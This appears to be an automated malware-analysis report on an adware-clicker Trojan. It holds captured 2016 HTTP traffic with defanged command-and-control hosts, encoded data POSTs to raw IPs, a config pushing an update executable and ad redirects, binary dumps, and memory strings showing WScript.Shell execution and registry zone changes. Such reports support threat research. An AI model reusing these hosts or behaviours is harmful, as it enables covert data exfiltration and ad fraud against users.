GET hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip HTTP/1.1

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Length: 2129486

Content-Type: application/zip

Last-Modified: Fri, 18 Mar 2016 10:30:58 GMT

Date: Wed, 11 May 2016 21:18:09 GMT

PK.........YVH................install.infUX...{.V.{.V....uR]k.0.}/.?..7. 2...vcc*Ce.tH.^.`......_.....S..9.~e......a.`....@..7&2yR.l.l....#..Ic.R.J..A.`.$....q.J'.IkX.....Y.d.1..G...~....%.......,.C......cYT....ao.u....'...GN...]......Y]g0.......%8.B.0......XFLv........M.!...2.-.ZP..........JH|.....k....3UpZ.S6y".'..>I.GS*h..y..V...io..h.... .A......0.G.8.B.t.x.....i...7.....M....i{a..."l..5...'....\.n..|...S....<..PK....B.j.......PK.........Q[H................XBLive.exeUX.....V$..V......{|.E..>..,.8.,....\q............5j. Q#&...n.$hp......CQ..O.....0...S.AN.!.E.Y....7.UU...&....~....??..............=v.`....WW'....K..._..]...k..[l......kvAa..h..Gg<......N..s=..k....p. ..{\.M...w.V..9.....i.c/...sH0.Z.L.0#G............r.v.l..s.aV.:1.^:....,....l,.M...qB..>4NXm.}.v....U........H..{d..~.*.a.a[..y...........7.X...%9Q......YFj..Ih.........1.....v.#..t..7.............pMCxM..........FLs=./.....~..[......N......y.......|oJ..~}R.<..o......<....5.:,./....,....-%.......R.......<d..{....._.w.80p.4y.....>.."..dv..).6...U................R..U..n......gb@......Q...BQ...RV....6...5....V.....o6.Z.C)..t.Vc.j.?.@...d...v.;...H..,. ..>...../pV..M.F9#Q.H.$7..JS......f.Ok..tH....n .8..V>....2=...f.[Y..I.).@&."....,.h5c...........Y....(|u""Rp..........@...............,HM.0.k.W.j.TmkG=...........RN.1.8b.... .7.P...].....ot..g'.(..~...FJ..l.....c.fe.LU..7..4(9..... .?.L......R]..|.Y...XWWo<T....0...../s...>.....C..........[)y.".P].{....u.]m...h=.Q.}.tW/...m. %!}.2.....M).n..)n...v@.dP.@..._.......@

<<< skipped >>>

POST hXXp://hen2.microaol.net/api HTTP/1.1

Content-Type: application/json

Content-Length: 198

Yzp7cHl2dn10OiI6fH1qfXtzbWs6NDp9bn12bDoiOmtseWpsOjQ6cXw6Ii80OnR3

e3l0fToiKSgrKzQ6aGp3fG17bDoiOl5qcW5UeW12e3B9ajo0Om1tcXw6IjpjKnos

Kip5ICwhfXp8LCx8KiF eS99LSB9fCl6ICB LX5lOjQ6bn1qa3F3djoiOio2KTpl

HTTP/1.1 200 OK

Content-Length: 39

Content-Type: application/json

Date: Wed, 11 May 2016 21:18:07 GMT

{"rc":0,"st":1463001487,"payroll":null}..

POST /upload.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 178.33.69.66

Content-Length: 236

Cache-Control: no-cache

I21F3cM/AoSf lEcGrGqs1 vcKjRRcc2OgPH4txv0YZ 24G2khb6H6/e6RXwLDdAWJ4E /nS Nscth32/vuQGaIVy Hfu9BdZ8m2vBmoGEjUVvXgvjg5vl31Zq3tfdfRb8ia9gjDY9OTotW8gAcWUM9xilQN4ROnLUuC 60MSjISO6iY4JU10NilwsJezJLoKtf5pn8yPFUzsFK 3zbT5yGdeaO0P9mbFBqL1CD9xuz5

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 11 May 2016 21:17:23 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 208

Connection: keep-alive

Keep-Alive: timeout=60

Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>.HTTP/1.1 404 Not Found..Server: nginx..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Type: text/html; charset=iso-8859-1..Content-Length: 208..Connection: keep-alive..Keep-Alive: timeout=60..Vary: Accept-Encoding..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 302 Moved Temporarily

Server: AkamaiGHost

Content-Length: 0

Location: hXXp://VVV.microsoft.com/uk-ua/

Date: Wed, 11 May 2016 21:17:23 GMT

Connection: keep-alive

X-CCC: SE

X-CID: 2

HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: http://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2..HTTP/1.1 302 Moved Temporarily..Server: AkamaiGHost..Content-Length: 0..Location: hXXp://VVV.microsoft.com/uk-ua/..Date: Wed, 11 May 2016 21:17:23 GMT..Connection: keep-alive..X-CCC: SE..X-CID: 2......

GET /uk-ua/ HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Cache-Control: no-cache

Host: VVV.microsoft.com

HTTP/1.1 200 OK

Cache-Control: no-cache, no-store

Pragma: no-cache

Content-Type: text/html

Expires: -1

Server: Microsoft-IIS/8.0

CorrelationVector: yfCcznapsU2gXoc6.1.1

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS

Access-Control-Allow-Credentials: true

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

X-Frame-Options: SAMEORIGIN

Content-Length: 61702

Date: Wed, 11 May 2016 21:17:24 GMT

Connection: keep-alive

Set-Cookie: MS-CV=yfCcznapsU2gXoc6.1; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/

Set-Cookie: MS-CV=yfCcznapsU2gXoc6.2; domain=.microsoft.com; expires=Thu, 12-May-2016 21:17:24 GMT; path=/

X-CCC: SE

X-CID: 2

...<!DOCTYPE html ><html xmlns:mscom="hXXp://schemas.microsoft.com/CMSvNext" xmlns:md="hXXp://schemas.microsoft.com/mscom-data" lang="uk-ua" xmlns="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="//VVV.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="//ajax.aspnetcdn.com/ajax/jQuery/jquery-1.7.2.min.js">.. // Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - hXXp://VVV.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));document.getElementsByTagName("head")[0].appendChild(msViewportStyle)}/*]]>*/</script><title>Microsoft..... ................ .............. ................</title><meta name="Title" content="Microsoft..... ................ .............. ................" /><meta name="CorrelationVector" content="yfCcznapsU2gXoc6.1" /><meta name="Description" content="......

<<< skipped >>>

POST /upload.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 178.33.69.66

Content-Length: 252

Cache-Control: no-cache

eDFG25RpA4HXUB9aA57v4Jf/LX4Yb X7Qjgzl5gDgWnn5dEeL6hz0k8hvVjRbkndxMyI2gxoKDsZgIA1536p4VJzxMwfr8r30dsyCJ6GYNQrJi/UQIsgcaHwbPLw62bJUkpk9smhN3IyYxe3l8/2qhz1/hkGKemUVUm7BqNbsuicwahjd32U5Vd2O2bGOxJIgACIRUyFy YZjDSNgdjn4gIGoEwvz9vpM4v5qL Qz6gccxjE3NTrREHtYzU=

HTTP/1.1 404 Not Found

Server: nginx

Date: Wed, 11 May 2016 21:17:23 GMT

Content-Type: text/html; charset=iso-8859-1

Content-Length: 208

Connection: keep-alive

Keep-Alive: timeout=60

Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>.HTTP/1.1 404 Not Found..Server: nginx..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Type: text/html; charset=iso-8859-1..Content-Length: 208..Connection: keep-alive..Keep-Alive: timeout=60..Vary: Accept-Encoding..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /upload.php was not found on this server.</p>.</body></html>...

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 69.87.192.155

Content-Length: 408

Cache-Control: no-cache

dm0QjMM9U8cXsnF7FTbIGOCM5CPbNHQkqyrw22LVodJJB x1xEj1RZr7FhA8rTDmdi1eNhFKDExvAzmqDFVi2KhiMmh mqHjdGMiPsBbysLNqjnHAHNrY2joVCbrKluaa RxkZCYmABbj0CAUy2E0NlQit1wUs1IMeoddssft8Stb8RvGHH8ZJhek1prBxKflsDQx33wWW8kBjovjfgpe9iUSZSKg2SA2M7xN6uRr47BHcdYho0H NT/KmXdMk3EDcqr2fsPDHss90EVJCtB00phL2ZzgKI9xrEXWNqG13xdhs91LhdFjR/5cVljSeHbJuyH5xJO6NlfmLc0jRPwbU3 nAxqYpFnYDdegD4a3R8Wp0DaW6OsbivXdnpLYeSUHtHsr8msTrxL zmZ3kOexHU=

HTTP/1.1 200 OK

Connection: close

Date: Wed, 11 May 2016 21:17:24 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 26633

Content-Type: text/html

Set-Cookie: ASPSESSIONIDASBCQCDC=MELFGAMBCBPDKDIOKADFMLAF; path=/

Cache-control: private

..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />..<title>......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......</title>..<meta name="keywords" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<meta name="description" content="......1.4318,1.4462....,15crmo....22053,s31803........,17-4ph......" />..<link rel="stylesheet" type="text/css" href="http://69.87.192.155/css.asp?smbdjedjei">..<link href="hXXp://69.87.192.155/mb/26/images/css.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/51mybao.css" rel="stylesheet" type="text/css" />..<link href="hXXp://69.87.192.155/mb/26/images/p-list.css" rel="stylesheet" type="text/css" />..<body>..<div class="top">..<div id="top_content">..<div id="top_left">..<a href="hXXp://69.87.192.155/smbdjedjei-37413/">dn180..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-37854/">f60..........</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-38295/">gh4145....</a>|..<a href="http://69.87.192.155/smbdjedjei-38736/">incoloy825....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39177/">inconel....</a>|..<a href="hXXp://69.87.192.155/smbdjedjei-39618/">n10665..

<<< skipped >>>

GET /download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: download.microsoft.com

Cache-Control: no-cache

Cookie: MS-CV=yfCcznapsU2gXoc6.2

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Fri, 09 Oct 2009 23:52:17 GMT

Accept-Ranges: bytes

ETag: "6d3979883b49ca1:0"

Server: Microsoft-IIS/8.5

Content-Disposition: attachment

Content-Length: 6156064

Date: Wed, 11 May 2016 21:17:26 GMT

Connection: keep-alive

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#pA.B...B...B..gM...B...B...B..gMC..B..gMA..B..gM@..B..gMD..B..Rich.B..........................PE..L....jkG.............................c... ........... ................................^.......... ......................................x.............]. ........... "...............................&..@............ ...............................text........ ...................... ..`.data...............................@....rsrc...x........H].................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................l...V...:..."...............................|...................................(...r...d...T.......*...........P...j...................<...................\.......................................>...L...^...n...........................................2...L.......h...p.......................................(...>...L...`...v...................................N...>...,...................d...........................................................z...,...<...J...\...|.......N...Z...d...n...@....

<<< skipped >>>

Q...y?...0R..J..sI..pZ.)$.ft..)........G.(CwW{... ....%{...._?F.Nb..4])o..e.b{..v.V..

HTTP/1.1 400 Bad Request

Content-Type: text/html

Date: Wed, 11 May 2016 21:17:23 GMT

Connection: close

Content-Length: 35

<h1>Bad Request (Invalid Verb)</h1>..

GET /browser.jsonp HTTP/1.1

Host: genisys.online

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 11 May 2016 21:16:48 GMT

Content-Type: application/json; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d2f421bdf8e89fa5b74fdc38460a791651463001408; expires=Thu, 11-May-17 21:16:48 GMT; path=/; domain=.genisys.online; HttpOnly

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.9-1ubuntu4.11

Set-Cookie: CAKEPHP=pe4o11m4je6kqalqh98umh3g63; expires=Thu, 12-May-2016 01:16:48 GMT; Max-Age=14400; path=/; HttpOnly

cfffi: UA

caching-disabled: 0

Server: cloudflare-nginx

CF-RAY: 2a18a77007c216c4-ARN

4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..

<<< skipped >>>

r...v:...<..f.....v...ed.p.IL...H..4...W].P...I}.7.n...........Wuc.O. .Km...3L.o~...-3.tV.....x^...YO...V.........z.CB

HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=us-ascii

Server: Microsoft-HTTPAPI/2.0

Date: Wed, 11 May 2016 21:17:29 GMT

Connection: close

Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Bad Request</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>..<BODY><h2>Bad Request - Invalid Verb</h2>..<hr><p>HTTP Error 400. The request verb is invalid.</p>..</BODY></HTML>....

GET / HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: microsoft.com

Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8

Location: hXXp://VVV.microsoft.com/

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Wed, 11 May 2016 21:17:23 GMT

Content-Length: 148

<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>HTTP/1.1 301 Moved Permanently..Content-Type: text/html; charset=UTF-8..Location: hXXp://VVV.microsoft.com/..Server: Microsoft-IIS/8.5..X-Powered-By: ASP.NET..Date: Wed, 11 May 2016 21:17:23 GMT..Content-Length: 148..<head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://VVV.microsoft.com/">here</a></body>..

POST hXXp://hen2.microaol.net/api HTTP/1.1

Content-Type: application/json

Content-Length: 216

Yzp6andva31qOiI6OjQ6e3B5dnZ9dDoiOnx9an17c21rOjQ6fW59dmw6Ijp/fWw6

NDpxfDoiLzQ6dHd7eXR9OiIpKCsrNDpoand8bXtsOiI6XmpxblR5bXZ7cH1qOjQ6

bW1xfDoiOmMqeiwqKnkgLCF9enwsLHwqIX55L30tIH18KXogIH4tfmU6NDpufWpr

cXd2OiI6KjYpOmU=

HTTP/1.1 302 Found

Location: hXXp://hen2.microaol.net/f/go184.7531c668845f402cb058ad10921a3520.zip

Date: Wed, 11 May 2016 21:18:08 GMT

Content-Length: 0

Content-Type: text/plain; charset=utf-8

GET /browser.jsonp HTTP/1.1

Host: genisys.online

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 11 May 2016 21:16:58 GMT

Content-Type: application/json; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d08ae627aef3d5d16e727a6ce4a8af1131463001418; expires=Thu, 11-May-17 21:16:58 GMT; path=/; domain=.genisys.online; HttpOnly

Vary: Accept-Encoding

X-Powered-By: PHP/5.5.9-1ubuntu4.11

Set-Cookie: CAKEPHP=cblnu4h61fme4stsiu2p3ocbs2; expires=Thu, 12-May-2016 01:16:58 GMT; Max-Age=14400; path=/; HttpOnly

cfffi: UA

caching-disabled: 0

Server: cloudflare-nginx

CF-RAY: 2a18a7b0bde2370e-ARN

4bf..SMInitCallback({"Settings":{"google_tracking_id":"UA-73331235-1","cookies_time":86400},"Update":{"version":"0.1","url":"http:\/\/VVV.genisys.online\/public\/70bdc32ebc2a.exe","param":""},"banners":[],"htmlblock":[],"socialadv":[{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"facebook","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""},{"title":"Don't Lose Your Digital Life! ","description":"It's 100% Free!","url":"http:\/\/VVV.mb01.com\/lnk.asp?o=5018&a=183219&c=57410","type":"youtube","image":"http:\/\/2.bp.blogspot.com\/-fG-cuYLBqkE\/UBu6s8Ash5I\/AAAAAAAAADM\/Z-3EtYGIMcw\/s1600\/mypcbackup backup your life.jpg","country":""}],"blackList":[],"customScripts":[{"url":"http:\/\/VVV.genisys.online\/custom.js","protocol":1},{"url":"https:\/\/VVV.genisys.online\/customHTTPS.js","protocol":2}],"triggerDomains":[],"triggerLinks":{"usa.com":{"redirect":"http:\/\/VVV.adwareroi.com\/?keyword={{KEY}}&subid={{SUBID}}&userid={{USERID}}","window_height":"800","window_width":"800","country":"","time":false}},"country":"UA"})..0..

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

regsvr32.exe_2700_rwx_00080000_00132000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2

IWebBrowser2

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

4,41494^4

4,41494^4

6%6X6v6

6%6X6v6

6*636@6~6

6*636@6~6

>0>>>[>~>

>0>>>[>~>

6%6s6

6%6s6

67

67

7%7X7

7%7X7

3%4,41464

3%4,41464

6-676H6l6v6}6

6-676H6l6v6}6

Uh.EE

Uh.EE

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

c:\docume~1\"%CurrentUserName%"\locals~1\temp\nsq2.tmp\clicker\clicker.exe /s path>path inj_ffile>inj_ffile

c:\docume~1\"%CurrentUserName%"\locals~1\temp\nsq2.tmp\clicker\clicker.exe /s path>path inj_ffile>inj_ffile

regsvr32.exe_2700:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

